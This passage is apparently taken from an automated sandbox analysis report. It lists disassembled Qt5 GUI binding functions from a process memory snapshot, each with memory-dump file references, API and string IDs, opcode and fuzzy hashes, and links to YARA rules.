                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?availableGeometry@Rect@@Screen@@malloc
                                                                                                                                                                                                                                          • String ID: QScreen$availableGeometry$availableGeometry(self) -> QRect
                                                                                                                                                                                                                                          • API String ID: 1745336275-3514874228
                                                                                                                                                                                                                                          • Opcode ID: 49469ab52b471dffe08a82612dc637538c161a3c14d5e1b28dde4d8e8f280c07
                                                                                                                                                                                                                                          • Instruction ID: 1058c5957602034f78ffdd891b874eb24cad018b45c01456ae947d7a4b46db6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49469ab52b471dffe08a82612dc637538c161a3c14d5e1b28dde4d8e8f280c07
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB113C37A08A4681EB10DF51E8496A933A4FB44FD0F918032D98E07320EF7DF559C344
                                                                                                                                                                                                                                          Function 00007FF89D9B9FD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?clipBoundingRect@QPainter@@QEBA?AVQRectF@@XZ.QT5GUI ref: 00007FF89D9BA028
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?clipBoundingPainter@@RectRect@malloc
                                                                                                                                                                                                                                          • String ID: QPainter$clipBoundingRect$clipBoundingRect(self) -> QRectF
                                                                                                                                                                                                                                          • API String ID: 4051243836-18387798
                                                                                                                                                                                                                                          • Opcode ID: 66dbe4922fdeaaf945f2ba1eb4cc0cadbbbc93bfb9e23534778a9899d9f002b9
                                                                                                                                                                                                                                          • Instruction ID: fc34e9cb3af927e56b7a9244f2723bc01e565cfbf290064e69bbbe17f5b1c7fc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66dbe4922fdeaaf945f2ba1eb4cc0cadbbbc93bfb9e23534778a9899d9f002b9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43110977A08B4681EB109F65E8496A933A4FB44FD0F918032D99E07320EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D959FD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?rect@QTextInlineObject@@QEBA?AVQRectF@@XZ.QT5GUI ref: 00007FF89D95A028
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?rect@InlineObject@@RectTextmalloc
                                                                                                                                                                                                                                          • String ID: QTextInlineObject$rect$rect(self) -> QRectF
                                                                                                                                                                                                                                          • API String ID: 953544639-1617625793
                                                                                                                                                                                                                                          • Opcode ID: a92a5fc0f0efbfbbe6f3fd7a734d401c06c60eccc059be02fbd3875958d7ec74
                                                                                                                                                                                                                                          • Instruction ID: 6cfb4059a5143b8a0cc17d4531b2595a708b8447648fc4ffce1327df6b229a9d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a92a5fc0f0efbfbbe6f3fd7a734d401c06c60eccc059be02fbd3875958d7ec74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C011F337A08A4681EB109F61E84A6A923A4FB48FD4F918032DA9E47320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D99DF30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?textOption@QStaticText@@QEBA?AVQTextOption@@XZ.QT5GUI ref: 00007FF89D99DF88
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?textOption@Option@@StaticTextText@@malloc
                                                                                                                                                                                                                                          • String ID: QStaticText$textOption$textOption(self) -> QTextOption
                                                                                                                                                                                                                                          • API String ID: 4070111431-2825344591
                                                                                                                                                                                                                                          • Opcode ID: 4e245d7aef438e946ede31001756702ca612b7c3095a3b6f9e0deb5182f79b7e
                                                                                                                                                                                                                                          • Instruction ID: a8cde272e500f628315ac57bc0d488161e11dc2b4a269c95286c08fe49271399
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e245d7aef438e946ede31001756702ca612b7c3095a3b6f9e0deb5182f79b7e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2113937A08A4685EB10DF21E88A6A933A5FB44FD0F918032D99E07320EF7CE559C344
                                                                                                                                                                                                                                          Function 00007FF89D937F30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?fullRectPoints@QPageLayout@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FF89D937F88
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?fullLayout@@PagePoints@RectRect@@malloc
                                                                                                                                                                                                                                          • String ID: QPageLayout$fullRectPoints$fullRectPoints(self) -> QRect
                                                                                                                                                                                                                                          • API String ID: 46280711-4079763324
                                                                                                                                                                                                                                          • Opcode ID: 5987976b00c010a2e7a58e060796b2e2229fadf4ca4330a42f22f91e89f1cf42
                                                                                                                                                                                                                                          • Instruction ID: 7ccef1a2fb1233824a4f0d46c22aa4fc0d201eeb5c673dd9910dd7344cdfc501
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5987976b00c010a2e7a58e060796b2e2229fadf4ca4330a42f22f91e89f1cf42
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98113577A09A46C2EB10DF21E84A6A933A4FB44FD0F914032DA8E07320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D959DB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: QTextInlineObject$isValid$isValid(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 2610644205-3622700107
                                                                                                                                                                                                                                          • Opcode ID: 9a12584f9f8b4398e24214ba72943bd925feda353f405b873b9434ee2e2499d8
                                                                                                                                                                                                                                          • Instruction ID: 6508dba61fc3cd291e3dfeb69b5ee01ad195fb500d6a6637000d4c5beae671f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a12584f9f8b4398e24214ba72943bd925feda353f405b873b9434ee2e2499d8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90017537A04B46C2EB108F55E4894A873E8FF44B90B958036CE9E43330EF78E5A8C344
                                                                                                                                                                                                                                          Function 00007FF89D985AA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setAlphaBufferFormat@@Size@Surface
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$setAlphaBufferSize$setAlphaBufferSize(self, size: int)
                                                                                                                                                                                                                                          • API String ID: 3682934702-1963592284
                                                                                                                                                                                                                                          • Opcode ID: 4c21275f77da6cb3fbcc058cb3f3b7a9d0fde10fea4944c05a0257792545f041
                                                                                                                                                                                                                                          • Instruction ID: daff643a1a3512eedafecf3324643a6886dcd466e2e9fd5ffb1e892fc77740dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c21275f77da6cb3fbcc058cb3f3b7a9d0fde10fea4944c05a0257792545f041
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4110636A18E46C1EB108F10E8896A933A4FB44B84F914032DA8E03320EF3DE55AC744
                                                                                                                                                                                                                                          Function 00007FF89D973A90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
